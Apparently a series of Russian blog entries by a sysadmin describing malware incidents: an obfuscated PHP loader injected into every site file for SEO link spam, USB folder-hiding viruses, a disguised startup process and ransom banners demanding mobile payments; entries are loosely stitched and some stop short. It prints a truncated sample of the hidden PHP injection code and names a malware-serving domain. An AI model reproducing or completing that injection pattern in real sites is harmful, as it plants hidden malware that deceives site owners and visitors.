Проснувшись однажды утром ипробежавшись по своим проектам я заметил, что посещаемость немного упала, позиции снизились, а 1 сайт вообще не загружался. Полез на ФТП, в админку и в базу. Иобнаружил непонятный файд license.txt в корне всех моих проектов, на одном из хостинг аккаунтов. А затем я увидел это файл в корне всех своих сайтов. Закрались странные подозрения.

В самом файле был какой-то код или хеш, разбираться я не стал. Как выяснилось позже заражены были все сайты, кроме 3 на wordpress, и то я думаю потому что там лежат файлы license.txt от самого движка. Либо у хакера не хватило ума заражать файлы в UTF кодировке. Но суть не в этом.

Я начал открывать все файлы PHP и о чудо! Обнаружил в начале ВСЕХ PHP файлов неизвестнымй мне доселе код.

<?php

$md5 = "1e9619967fab8ca00c9073a6e4a23cea";
$wp_salt = array('d',"n",'g','s','l',"4",'i',"v",'$',"_","o",'e',"f","z","b",';','t',"c","a","(","r",')','6');
$wp_add_filter = create_function('$'.'v',$wp_salt[11..многатакогомассива;
$wp_add_filter('FZlHEqtIAkS.. многабукаф');
?>

Было окончательно понятно, что кто-то меня поимел. Поискав по фрагменту кода это чудо текст я наткнулся на пару мессаг на форумах от народа с аналогичными проблемами. Этот чудесный код, как оказалось зарабатывал бабло ребятам. Размещался на каждой странице блок с ссылками  на раскручиваемые ими сайты. Юзер зашедший на сайт видел обычный сайт а вот гуглобот видел следующее.

Очередной комп родственников с подозрениями на тот самый вирус, подменяющий скрытые папки файлами на флешках. Запуск любимого AutoRuns показал наличие подозрительного файла в автозагрузке.

Удалил ключ, зашел в папку, а там такого файла нет. Либо его уже убил антивирус, либо одно из двух. В общем его там не было, а был там sdata.dll. Запустив ProcessExplorer и поискав по заголовку sdata.dll нашел его запущенным со всеми EXE файлами в системе, в том числе и explorer.exe. Так что ручками из винды гада удалить не получилось. Ибо он запускался с каждым EXE файлом дочерним explorer.exe.

Довольно часто ко мне начали приходить юзеры, жалуясь на вирусняки на флешках. Ниче особенного, вроде бы, но вирус настолько нелепый. Он делает все каталоги на флешке скрытыми и системными в итоге их не видно, а вместо них подставляет свои вирусные тела с иконкой папке. Как вирус копаньон. Юзер думает что открывает папку, а запускает сначала вирус, а уже потом открывается одноименная с ним папка.

Удалить все зараженные *.exe файлы абсолютно не трудно. Проблема возникает, когда пытаешься сделать все папки на флешке обратно, не скрытыми. Чекбокс в котором можно убрать атрибут скрытый, заблокирован и кликнув мышкой сделать такое не получается.

В итоге пришлось вспомнить школьный курс информатики. Создал bat файл следующего содержания:

ATTRIB -h -s -a -r /s /d  *.*
pause

Залил на флешку и запустил. Вуаля, все атрибуты как рукой сняло. Особенно актуально если на флешке много барахла.

На очередной машинке юзера столкнулся с проблемой нереального его торможения. Комп тупит из-за жрущего весь процессор файла — svchost.exe. Сразу же полез в Autoruns? смотреть строки userinit и winlogon. Но и там и во всех ключах реестра никого подозрительного на нашел.

Скачал свежий cureit!. Прогнал машинку и вуаля.

Вирус лежал в папке автозагрузки юзера и маскировался под нормальный процесс igfxtray.exe. По всей видимости вытащив его из реестра и подменив собой, что и сбило меня с толку. Что делал вирус мне не известно, так как других его провялений, кроме торможения компа, я не заметил.

Файл успешно убился и система начала снова работать в нормальном режиме.

У одного из сотрудников на рабочем столе вылез баннер, утверждающий что человек весь день смотрел гей-норнушку в которой мужики друг ждруга трахают. И угрожая удалить все с компьютера, требует положить на счет хрен знает кому 500 рублей.

Мессадж такой: Пополните счет абонента МТС 9156345781 на 500 рублей.

e_du18je.dll — Это часть драйвера принтера Epson Stylus R800. Висит в системе и следит за состоянием принтера и статус монитора. Иногда может вызывать ошибку и крах файла explorer.exe. Спасает только переустановка драйвера.

Название процесса: E_DU18xE
Приложение, использующее этот процесс: EPSON Color Printing System
Автор: SEIKO EPSON CORPORATION
Описание: e_du18je.dll этот процесс еще не описан.

Привет тебе несчастный. По всей видимости, тебя настигла учесть, ковыряться с компьютером у которого нет рабочего стола. Именно с такой же проблемой столкнулся однажды и я.

Суть такова — Машина Windows 7 HomeBasic русская, девочка схватила SMS вирус, перезагрузилась и после перезагрузки SMS отправлять уже не просили, только вместо рабочего стола отображается пустой зеленый экран и курсор мыши. Через Ctrl + Shift + Esc получается вызвать диспетчер задач и запустить explorer. Но рабочего стола так и нет.

Однажды утром, зайдя на свое сайт я увидел, что некий файл *.asx или *.pdf пытается без моего согласия сохраниться на мой компьютер. Сразу после загрузки говнофайла Nod32 выдал мне мессадж, что файл этот является ни кем иным, как вирусом.

От как-то так. Файл загружался с сайта jtc.cz.cc. Однако в исходном коде страницы, ни одного упоминания этого домена нет.

У одной из сотрудниц снова выскочил говно-вирус.

Внимание!! Вы просматривали гей-порно видео в течении трёх часов. Время бесплатного просмотра истекло. Для того, чтобы оплатить услугу, Вам необходимо пополнить через терминал экспресс-оплаты счет абонента Билайн 9639240013 на сумму 470 руб. После оплаты на квитанции Вы найдёте код активации. Введите его в поле ниже и нажмите Enter.

Лечим.